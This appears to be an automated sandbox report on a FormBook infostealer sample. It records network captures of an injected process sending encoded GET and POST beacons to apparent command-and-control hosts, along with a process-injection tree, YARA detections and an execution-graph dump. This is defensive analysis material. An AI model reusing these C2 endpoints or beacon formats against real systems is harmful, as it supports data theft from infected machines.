                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            48192.168.2.550022162.218.30.235802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:06:01.251311064 CET562OUTGET /9wie/?glL=fUVF0yGwbjZS9JQH12rZ580bfGpiumkyA0dLZ5nzo5P8yhbpEdmY75SbGAh7VrLR/io7d1Ft+bkykmkNpko73APUSyaK4huICcj6uecTmafkZBba7diBV9QQlm/AYdU87w==&UBE=olMPpNEHS HTTP/1.1
                                                            Host: www.l40175.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:06:02.458425999 CET492INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Mon, 16 Dec 2024 21:06:02 GMT
                                                            Connection: close
                                                            Content-Length: 315
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            49192.168.2.550023109.206.161.15802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:06:08.205293894 CET835OUTPOST /gaxh/ HTTP/1.1
                                                            Host: www.asianoilporn.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.asianoilporn.xyz
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.asianoilporn.xyz/gaxh/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 4d 52 63 4c 77 70 39 6d 57 54 78 38 77 6b 43 6f 67 33 65 51 42 32 76 63 61 6a 77 58 4c 77 44 68 42 69 61 6b 52 6f 50 4a 46 67 4d 64 6e 49 4d 41 6a 49 78 43 66 78 6e 5a 6c 67 6a 63 55 4f 48 74 2f 6f 2b 68 78 38 39 62 44 4b 67 31 4f 5a 78 56 75 50 54 59 6a 6f 44 45 51 30 41 67 74 76 57 54 59 36 4c 45 73 71 4d 5a 47 57 6b 4c 50 43 4c 64 46 34 66 4c 66 78 4e 58 2b 64 75 67 75 45 74 78 76 57 5a 73 62 48 6a 58 62 7a 35 39 4c 52 49 4a 71 47 33 61 51 5a 61 57 41 54 6c 58 31 57 47 78 52 79 4a 66 56 2b 78 31 77 67 46 5a 52 41 7a 74 76 59 70 36 4a 74 30 6b 6a 46 4d 44 71 36 32 7a 6f 4d 33 4b 66 46 41 3d
                                                            Data Ascii: glL=MRcLwp9mWTx8wkCog3eQB2vcajwXLwDhBiakRoPJFgMdnIMAjIxCfxnZlgjcUOHt/o+hx89bDKg1OZxVuPTYjoDEQ0AgtvWTY6LEsqMZGWkLPCLdF4fLfxNX+duguEtxvWZsbHjXbz59LRIJqG3aQZaWATlX1WGxRyJfV+x1wgFZRAztvYp6Jt0kjFMDq62zoM3KfFA=
                                                            Dec 16, 2024 22:06:09.354762077 CET472INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:06:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            X-Powered-By: PHP/7.4.33
                                                            Set-Cookie: last_url=content; expires=Tue, 17-Dec-2024 21:06:09 GMT; Max-Age=86400; path=/
                                                            Set-Cookie: to=%7Curl; expires=Tue, 17-Dec-2024 21:06:09 GMT; Max-Age=86400; path=/
                                                            Content-Encoding: gzip
                                                            Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 53 50 80 00 e7 fc bc 92 d4 bc 12 85 bc fc 12 85 b4 fc d2 bc 14 85 82 c4 f4 54 05 00 7c c0 c9 f9 1f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2eSPT|0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            50192.168.2.550024109.206.161.15802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:06:10.960270882 CET855OUTPOST /gaxh/ HTTP/1.1
                                                            Host: www.asianoilporn.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.asianoilporn.xyz
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.asianoilporn.xyz/gaxh/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 4d 52 63 4c 77 70 39 6d 57 54 78 38 32 31 53 6f 73 30 47 51 47 57 76 62 57 44 77 58 43 51 44 6c 42 69 47 6b 52 71 6a 5a 47 56 38 64 6d 71 55 41 69 4a 78 43 59 78 6e 5a 71 41 6a 5a 4a 65 48 32 2f 70 44 57 78 38 42 62 44 4a 63 31 4f 63 64 56 75 63 37 5a 69 34 44 52 63 55 41 69 70 76 57 54 59 36 4c 45 73 71 49 2f 47 57 73 4c 4f 32 33 64 44 73 4c 49 53 52 4e 55 2f 64 75 67 71 45 73 34 76 57 59 35 62 47 2f 70 62 31 6c 39 4c 52 34 4a 71 58 33 56 61 5a 61 63 4f 7a 6b 69 30 6b 50 47 57 7a 49 58 64 4e 63 4b 70 79 38 6a 5a 57 43 48 31 36 68 53 61 4e 59 63 7a 57 45 30 37 4b 58 61 79 76 6e 36 42 53 56 72 78 6e 79 78 44 6b 67 75 58 49 48 37 5a 79 34 4b 34 67 61 6b
                                                            Data Ascii: glL=MRcLwp9mWTx821Sos0GQGWvbWDwXCQDlBiGkRqjZGV8dmqUAiJxCYxnZqAjZJeH2/pDWx8BbDJc1OcdVuc7Zi4DRcUAipvWTY6LEsqI/GWsLO23dDsLISRNU/dugqEs4vWY5bG/pb1l9LR4JqX3VaZacOzki0kPGWzIXdNcKpy8jZWCH16hSaNYczWE07KXayvn6BSVrxnyxDkguXIH7Zy4K4gak
                                                            Dec 16, 2024 22:06:12.253089905 CET472INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:06:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            X-Powered-By: PHP/7.4.33
                                                            Set-Cookie: last_url=content; expires=Tue, 17-Dec-2024 21:06:12 GMT; Max-Age=86400; path=/
                                                            Set-Cookie: to=%7Curl; expires=Tue, 17-Dec-2024 21:06:12 GMT; Max-Age=86400; path=/
                                                            Content-Encoding: gzip
                                                            Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 53 50 80 00 e7 fc bc 92 d4 bc 12 85 bc fc 12 85 b4 fc d2 bc 14 85 82 c4 f4 54 05 00 7c c0 c9 f9 1f 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 2eSPT|0


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:16:02:03
                                                            Start date:16/12/2024
                                                            Path:C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe"
                                                            Imagebase:0xf10000
                                                            File size:1'203'712 bytes
                                                            MD5 hash:31141591AD5AFA58B5FDC07AC96C8FFF
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:16:02:04
                                                            Start date:16/12/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe"
                                                            Imagebase:0x860000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2303693143.0000000002990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2303461712.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2304351781.0000000004750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:16:02:14
                                                            Start date:16/12/2024
                                                            Path:C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe"
                                                            Imagebase:0x160000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4582671918.0000000003830000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:4
                                                            Start time:16:02:16
                                                            Start date:16/12/2024
                                                            Path:C:\Windows\SysWOW64\ReAgentc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\ReAgentc.exe"
                                                            Imagebase:0x500000
                                                            File size:36'864 bytes
                                                            MD5 hash:1C8ED08C898D73964B98AAA5F06A0F63
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4582561177.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4582603239.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4581793209.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:16:02:28
                                                            Start date:16/12/2024
                                                            Path:C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe"
                                                            Imagebase:0x160000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4584397625.0000000005620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:8
                                                            Start time:16:02:40
                                                            Start date:16/12/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff79f9e0000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3.2%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:7.6%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:157
                                                              execution_graph 104164 f13633 104165 f1366a 104164->104165 104166 f136e7 104165->104166 104167 f13688 104165->104167 104208 f136e5 104165->104208 104171 f4d0cc 104166->104171 104172 f136ed 104166->104172 104168 f13695 104167->104168 104169 f1374b PostQuitMessage 104167->104169 104174 f4d154 104168->104174 104175 f136a0 104168->104175 104205 f136d8 104169->104205 104170 f136ca DefWindowProcW 104170->104205 104213 f21070 10 API calls Mailbox 104171->104213 104176 f136f2 104172->104176 104177 f13715 SetTimer RegisterWindowMessageW 104172->104177 104229 f72527 71 API calls _memset 104174->104229 104179 f13755 104175->104179 104180 f136a8 104175->104180 104183 f136f9 KillTimer 104176->104183 104184 f4d06f 104176->104184 104181 f1373e CreatePopupMenu 104177->104181 104177->104205 104178 f4d0f3 104214 f21093 341 API calls Mailbox 104178->104214 104211 f144a0 64 API calls _memset 104179->104211 104186 f136b3 104180->104186 104187 f4d139 104180->104187 104181->104205 104209 f1443a Shell_NotifyIconW _memset 104183->104209 104190 f4d074 104184->104190 104191 f4d0a8 MoveWindow 104184->104191 104194 f4d124 104186->104194 104201 f136be 104186->104201 104187->104170 104228 f67c36 59 API calls Mailbox 104187->104228 104188 f4d166 104188->104170 104188->104205 104195 f4d097 SetFocus 104190->104195 104196 f4d078 104190->104196 104191->104205 104193 f1370c 104210 f13114 DeleteObject DestroyWindow Mailbox 104193->104210 104227 f72d36 81 API calls _memset 104194->104227 104195->104205 104199 f4d081 104196->104199 104196->104201 104212 f21070 10 API calls Mailbox 104199->104212 104201->104170 104215 f1443a Shell_NotifyIconW _memset 104201->104215 104203 f13764 104203->104205 104206 f4d118 104216 f1434a 104206->104216 104208->104170 104209->104193 104210->104205 104211->104203 104212->104205 104213->104178 104214->104201 104215->104206 104217 f14375 _memset 104216->104217 104230 f14182 104217->104230 104220 f143fa 104222 f14430 Shell_NotifyIconW 104220->104222 104223 f14414 Shell_NotifyIconW 104220->104223 104224 f14422 104222->104224 104223->104224 104234 f1407c 104224->104234 104226 f14429 104226->104208 104227->104203 104228->104208 104229->104188 104231 f4d423 104230->104231 104232 f14196 104230->104232 104231->104232 104233 f4d42c DestroyIcon 104231->104233 104232->104220 104256 f72f94 62 API calls _W_store_winword 104232->104256 104233->104232 104235 f14098 104234->104235 104236 f1416f Mailbox 104234->104236 104257 f17a16 104235->104257 104236->104226 104239 f140b3 104262 f17bcc 104239->104262 104240 f4d3c8 LoadStringW 104243 f4d3e2 104240->104243 104242 f140c8 104242->104243 104245 f140d9 104242->104245 104244 f17b2e 59 API calls 104243->104244 104250 f4d3ec 104244->104250 104246 f140e3 104245->104246 104247 f14174 104245->104247 104271 f17b2e 104246->104271 104280 f18047 104247->104280 104252 f140ed _memset _wcscpy 104250->104252 104284 f17cab 104250->104284 104254 f14155 Shell_NotifyIconW 104252->104254 104253 f4d40e 104255 f17cab 59 API calls 104253->104255 104254->104236 104255->104252 104256->104220 104291 f30db6 104257->104291 104259 f17a3b 104301 f18029 104259->104301 104263 f17c45 104262->104263 104264 f17bd8 __NMSG_WRITE 104262->104264 104333 f17d2c 104263->104333 104266 f17c13 104264->104266 104267 f17bee 104264->104267 104268 f18029 59 API calls 104266->104268 104332 f17f27 59 API calls Mailbox 104267->104332 104270 f17bf6 _memmove 104268->104270 104270->104242 104272 f17b40 104271->104272 104273 f4ec6b 104271->104273 104341 f17a51 104272->104341 104347 f67bdb 59 API calls _memmove 104273->104347 104276 f4ec75 104278 f18047 59 API calls 104276->104278 104277 f17b4c 104277->104252 104279 f4ec7d Mailbox 104278->104279 104281 f18052 104280->104281 104282 f1805a 104280->104282 104348 f17f77 59 API calls 2 library calls 104281->104348 104282->104252 104285 f4ed4a 104284->104285 104286 f17cbf 104284->104286 104288 f18029 59 API calls 104285->104288 104349 f17c50 104286->104349 104290 f4ed55 __NMSG_WRITE _memmove 104288->104290 104289 f17cca 104289->104253 104294 f30dbe 104291->104294 104293 f30dd8 104293->104259 104294->104293 104296 f30ddc std::exception::exception 104294->104296 104304 f3571c 104294->104304 104321 f333a1 DecodePointer 104294->104321 104322 f3859b RaiseException 104296->104322 104298 f30e06 104323 f384d1 58 API calls _free 104298->104323 104300 f30e18 104300->104259 104302 f30db6 Mailbox 59 API calls 104301->104302 104303 f140a6 104302->104303 104303->104239 104303->104240 104305 f35797 104304->104305 104315 f35728 104304->104315 104330 f333a1 DecodePointer 104305->104330 104307 f3579d 104331 f38b28 58 API calls __getptd_noexit 104307->104331 104310 f3575b RtlAllocateHeap 104311 f3578f 104310->104311 104310->104315 104311->104294 104313 f35733 104313->104315 104324 f3a16b 58 API calls __NMSG_WRITE 104313->104324 104325 f3a1c8 58 API calls 4 library calls 104313->104325 104326 f3309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104313->104326 104314 f35783 104328 f38b28 58 API calls __getptd_noexit 104314->104328 104315->104310 104315->104313 104315->104314 104319 f35781 104315->104319 104327 f333a1 DecodePointer 104315->104327 104329 f38b28 58 API calls __getptd_noexit 104319->104329 104321->104294 104322->104298 104323->104300 104324->104313 104325->104313 104327->104315 104328->104319 104329->104311 104330->104307 104331->104311 104332->104270 104334 f17d3a 104333->104334 104336 f17d43 _memmove 104333->104336 104334->104336 104337 f17e4f 104334->104337 104336->104270 104338 f17e62 104337->104338 104340 f17e5f _memmove 104337->104340 104339 f30db6 Mailbox 59 API calls 104338->104339 104339->104340 104340->104336 104342 f17a5f 104341->104342 104343 f17a85 _memmove 104341->104343 104342->104343 104344 f30db6 Mailbox 59 API calls 104342->104344 104343->104277 104345 f17ad4 104344->104345 104346 f30db6 Mailbox 59 API calls 104345->104346 104346->104343 104347->104276 104348->104282 104350 f17c5f __NMSG_WRITE 104349->104350 104351 f18029 59 API calls 104350->104351 104352 f17c70 _memmove 104350->104352 104353 f4ed07 _memmove 104351->104353 104352->104289 104354 f11055 104359 f12649 104354->104359 104369 f17667 104359->104369 104364 f12754 104365 f1105a 104364->104365 104377 f13416 59 API calls 2 library calls 104364->104377 104366 f32d40 104365->104366 104385 f32c44 104366->104385 104368 f11064 104370 f30db6 Mailbox 59 API calls 104369->104370 104371 f17688 104370->104371 104372 f30db6 Mailbox 59 API calls 104371->104372 104373 f126b7 104372->104373 104374 f13582 104373->104374 104378 f135b0 104374->104378 104377->104364 104379 f135bd 104378->104379 104380 f135a1 104378->104380 104379->104380 104381 f135c4 RegOpenKeyExW 104379->104381 104380->104364 104381->104380 104382 f135de RegQueryValueExW 104381->104382 104383 f13614 RegCloseKey 104382->104383 104384 f135ff 104382->104384 104383->104380 104384->104383 104386 f32c50 __fcloseall 104385->104386 104393 f33217 104386->104393 104392 f32c77 __fcloseall 104392->104368 104410 f39c0b 104393->104410 104395 f32c59 104396 f32c88 DecodePointer DecodePointer 104395->104396 104397 f32c65 104396->104397 104398 f32cb5 104396->104398 104407 f32c82 104397->104407 104398->104397 104456 f387a4 59 API calls __wfsopen 104398->104456 104400 f32d18 EncodePointer EncodePointer 104400->104397 104401 f32cec 104401->104397 104405 f32d06 EncodePointer 104401->104405 104458 f38864 61 API calls 2 library calls 104401->104458 104402 f32cc7 104402->104400 104402->104401 104457 f38864 61 API calls 2 library calls 104402->104457 104405->104400 104406 f32d00 104406->104397 104406->104405 104459 f33220 104407->104459 104411 f39c2f EnterCriticalSection 104410->104411 104412 f39c1c 104410->104412 104411->104395 104417 f39c93 104412->104417 104414 f39c22 104414->104411 104441 f330b5 58 API calls 3 library calls 104414->104441 104418 f39c9f __fcloseall 104417->104418 104419 f39ca8 104418->104419 104420 f39cc0 104418->104420 104442 f3a16b 58 API calls __NMSG_WRITE 104419->104442 104428 f39ce1 __fcloseall 104420->104428 104445 f3881d 58 API calls 2 library calls 104420->104445 104423 f39cad 104443 f3a1c8 58 API calls 4 library calls 104423->104443 104424 f39cd5 104426 f39ceb 104424->104426 104427 f39cdc 104424->104427 104431 f39c0b __lock 58 API calls 104426->104431 104446 f38b28 58 API calls __getptd_noexit 104427->104446 104428->104414 104429 f39cb4 104444 f3309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104429->104444 104434 f39cf2 104431->104434 104435 f39d17 104434->104435 104436 f39cff 104434->104436 104448 f32d55 104435->104448 104447 f39e2b InitializeCriticalSectionAndSpinCount 104436->104447 104439 f39d0b 104454 f39d33 LeaveCriticalSection _doexit 104439->104454 104442->104423 104443->104429 104445->104424 104446->104428 104447->104439 104449 f32d87 _free 104448->104449 104450 f32d5e RtlFreeHeap 104448->104450 104449->104439 104450->104449 104451 f32d73 104450->104451 104455 f38b28 58 API calls __getptd_noexit 104451->104455 104453 f32d79 GetLastError 104453->104449 104454->104428 104455->104453 104456->104402 104457->104401 104458->104406 104462 f39d75 LeaveCriticalSection 104459->104462 104461 f32c87 104461->104392 104462->104461 104463 f37c56 104464 f37c62 __fcloseall 104463->104464 104500 f39e08 GetStartupInfoW 104464->104500 104466 f37c67 104502 f38b7c GetProcessHeap 104466->104502 104468 f37cbf 104469 f37cca 104468->104469 104585 f37da6 58 API calls 3 library calls 104468->104585 104503 f39ae6 104469->104503 104472 f37cd0 104473 f37cdb __RTC_Initialize 104472->104473 104586 f37da6 58 API calls 3 library calls 104472->104586 104524 f3d5d2 104473->104524 104476 f37cea 104477 f37cf6 GetCommandLineW 104476->104477 104587 f37da6 58 API calls 3 library calls 104476->104587 104543 f44f23 GetEnvironmentStringsW 104477->104543 104480 f37cf5 104480->104477 104483 f37d10 104484 f37d1b 104483->104484 104588 f330b5 58 API calls 3 library calls 104483->104588 104553 f44d58 104484->104553 104487 f37d21 104490 f37d2c 104487->104490 104589 f330b5 58 API calls 3 library calls 104487->104589 104567 f330ef 104490->104567 104491 f37d34 104492 f37d3f __wwincmdln 104491->104492 104590 f330b5 58 API calls 3 library calls 104491->104590 104573 f147d0 104492->104573 104495 f37d53 104496 f37d62 104495->104496 104591 f33358 58 API calls _doexit 104495->104591 104592 f330e0 58 API calls _doexit 104496->104592 104499 f37d67 __fcloseall 104501 f39e1e 104500->104501 104501->104466 104502->104468 104593 f33187 36 API calls 2 library calls 104503->104593 104505 f39aeb 104594 f39d3c InitializeCriticalSectionAndSpinCount __ioinit 104505->104594 104507 f39af0 104508 f39af4 104507->104508 104596 f39d8a TlsAlloc 104507->104596 104595 f39b5c 61 API calls 2 library calls 104508->104595 104511 f39af9 104511->104472 104512 f39b06 104512->104508 104513 f39b11 104512->104513 104597 f387d5 104513->104597 104516 f39b53 104605 f39b5c 61 API calls 2 library calls 104516->104605 104519 f39b32 104519->104516 104521 f39b38 104519->104521 104520 f39b58 104520->104472 104604 f39a33 58 API calls 4 library calls 104521->104604 104523 f39b40 GetCurrentThreadId 104523->104472 104525 f3d5de __fcloseall 104524->104525 104526 f39c0b __lock 58 API calls 104525->104526 104527 f3d5e5 104526->104527 104528 f387d5 __calloc_crt 58 API calls 104527->104528 104530 f3d5f6 104528->104530 104529 f3d661 GetStartupInfoW 104537 f3d676 104529->104537 104538 f3d7a5 104529->104538 104530->104529 104531 f3d601 __fcloseall @_EH4_CallFilterFunc@8 104530->104531 104531->104476 104532 f3d86d 104619 f3d87d LeaveCriticalSection _doexit 104532->104619 104534 f387d5 __calloc_crt 58 API calls 104534->104537 104535 f3d7f2 GetStdHandle 104535->104538 104536 f3d805 GetFileType 104536->104538 104537->104534 104537->104538 104539 f3d6c4 104537->104539 104538->104532 104538->104535 104538->104536 104618 f39e2b InitializeCriticalSectionAndSpinCount 104538->104618 104539->104538 104540 f3d6f8 GetFileType 104539->104540 104617 f39e2b InitializeCriticalSectionAndSpinCount 104539->104617 104540->104539 104544 f44f34 104543->104544 104545 f37d06 104543->104545 104620 f3881d 58 API calls 2 library calls 104544->104620 104549 f44b1b GetModuleFileNameW 104545->104549 104547 f44f5a _memmove 104548 f44f70 